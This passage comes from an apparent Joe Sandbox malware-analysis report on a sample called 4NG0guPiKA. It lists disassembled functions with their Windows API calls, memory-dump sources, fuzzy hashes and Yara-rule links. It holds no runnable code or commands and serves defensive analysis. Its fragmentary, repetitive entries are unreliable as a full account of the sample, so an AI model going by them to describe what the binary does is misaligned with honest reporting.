                                                                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3751793516-0
                                                                                                            • Opcode ID: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                            • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                                            • Opcode Fuzzy Hash: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                                            • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                                                            Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                            • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                            • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404258612-0
                                                                                                            • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                            • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                            • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                            • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                            Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                              • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                              • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 3585118688-0
                                                                                                            • Opcode ID: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                            • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                            • Opcode Fuzzy Hash: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                                            • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                            Function 00405108 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                              • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                            • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                            • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                            • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                            Function 00405B85 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405BBE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: nsa
                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                            • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                            • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                            • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                            • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                            Function 00405665 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 00405678
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                            • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                            • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                            • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                            Function 00406974 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                            • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                            • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                            • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                            Function 00406B75 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                            • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                            • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                            • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                            Function 0040688B Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                            • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                            • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                            • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                            Function 00406390 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                            • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                            • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                            • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                            Function 004067DE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                            • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                            • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                            • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                            Function 004068FC Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                            • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                            • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                            • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                            Function 00406848 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                            • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                            • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                            • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                            Function 000D1A40 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xq$Xq$Xq$Xq
                                                                                                            • API String ID: 0-3965792415
                                                                                                            • Opcode ID: 4f7897a2c8051ba29aa466395f44a5ccac91187d7ee9974b215acd82e4973cca
                                                                                                            • Instruction ID: e328931ee99707c7884afb88e86302cf9fa3491a19e217a1ba287b55c15ebacf
                                                                                                            • Opcode Fuzzy Hash: 4f7897a2c8051ba29aa466395f44a5ccac91187d7ee9974b215acd82e4973cca
                                                                                                            • Instruction Fuzzy Hash: BC313E30E0131A9BDBA48BA984553EEB7F6AB94310F1541AB8459A7351EF70CD81CBA2
                                                                                                            Function 000D58E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \;q$\;q$\;q$\;q
                                                                                                            • API String ID: 0-2933265366
                                                                                                            • Opcode ID: 4d173b14cf6b6b13e8a3b0ce88656275ad5315f9d496418c3a1b9751a841507a
                                                                                                            • Instruction ID: 986723572c48a9190014077759de95e09e56a89f1fef5824a1d48d012288535d
                                                                                                            • Opcode Fuzzy Hash: 4d173b14cf6b6b13e8a3b0ce88656275ad5315f9d496418c3a1b9751a841507a
                                                                                                            • Instruction Fuzzy Hash: EB014831700A15CFC7748A2DC875E29B3E6AF897727254167D806CB364DA71DC4197A1
                                                                                                            Function 00405ABB Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                            • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                            • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                            • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
